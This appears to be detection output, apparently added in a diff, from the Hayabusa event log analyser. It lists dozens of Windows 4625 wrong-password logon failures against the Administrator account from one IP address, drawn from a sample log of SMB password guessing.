+2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLycXLeAU21pdnXL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgwjJSKOPnurDWW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPDYdxPoQAl8aGMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CX8knunlT6SMpmQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAjYbt50leZt3Xve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CD0HUCdg4UWOiji | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dkeWmTE1R1rYaYP8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W87qcfSj4qWWUv4k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WUCyUQgbUqwaLj3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9nLhDbcvmVBZp4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBWo1zDdjaAeGDWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjHRFk2flmzzd1zg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 53HYxs9s7fpP1y6V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tluqXKvVooP7VNyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43m0nfi5tiv4TpSB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qjPyJXl984vViV6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MomQ8Yt51VsMiO4p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LJYCi5r2otMHxA8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4oUSkMBI8SGDLwYC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j1x3lyRjxn73KITB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh05BhGpwq1ho62a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxj6ITbiciyRNLbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uev2mjCaqHjm6NYi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L4WU383o9E5JyM5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfMv0lsoiRnTCFXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL4ahBqUyGeTONkE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8hJ888Kmyi6KqIPn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VZ6sfYMHuygnMdY2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XkuSlyTNc5OOoUtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Z13YmupcMato8Sd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JedeMnLPnRJEwhZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmy0c0wFheIRzSo4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sskKdqku5S0f1sWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 15Qg0nCXNj7Ub1Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZD6iuaqv70k69G87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gk3UuqTJmvH1snmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaw9iF5mJlyygdnB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Sr5PZAd1qMc7hi3c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l5xbQtyueVq3fJSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g2nP0zz2ofBxTGw6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SYJheREJmEwj0791 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: exglD9fnLwaqwRZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bSAU1QjasDAsmry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cfnrtXR7evQBbaOw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYAwjW99chcntPsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rG2PYfOTfT7QvbPu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FojDtfDNXq0gQfYu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SUTT0QycbFtyJfNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gcbv1lrcYdT9Wuli | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjdFfvCCfGXo7FUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzqGdWlGglLQx6Z4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3Rt80PMk70sVqbk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: okunzcEHnxUml4SG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qH0AY3DeIryuHSiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DjqtxY5Fly4qAusS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PXHYu7wAqo7m6mZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaEM3boErBRrCbna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nSzwstH2imPjwah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6NM0I4vRTXlLKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jYhjN3f8KlFIEUKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qWicYt2HXLDgc3kc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uz7yqqxdMrsM2L1g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqKTguT2Z3OPCxGR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ywpwCM4u6nFSq9oS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1t5ZBw3HOxux65e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtLFQSltjjOjdl2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AyFD3cjef0NUMZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDYECnF1YTKRKA3K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfqxcIVpX9BbsPIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjL5hvyYesMfDISw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3bh8c5ohv55SAX26 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MflfcFDnGU3xUOmz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aX0wfTs5FzCdwGrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gdU6faDjEH5wW2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
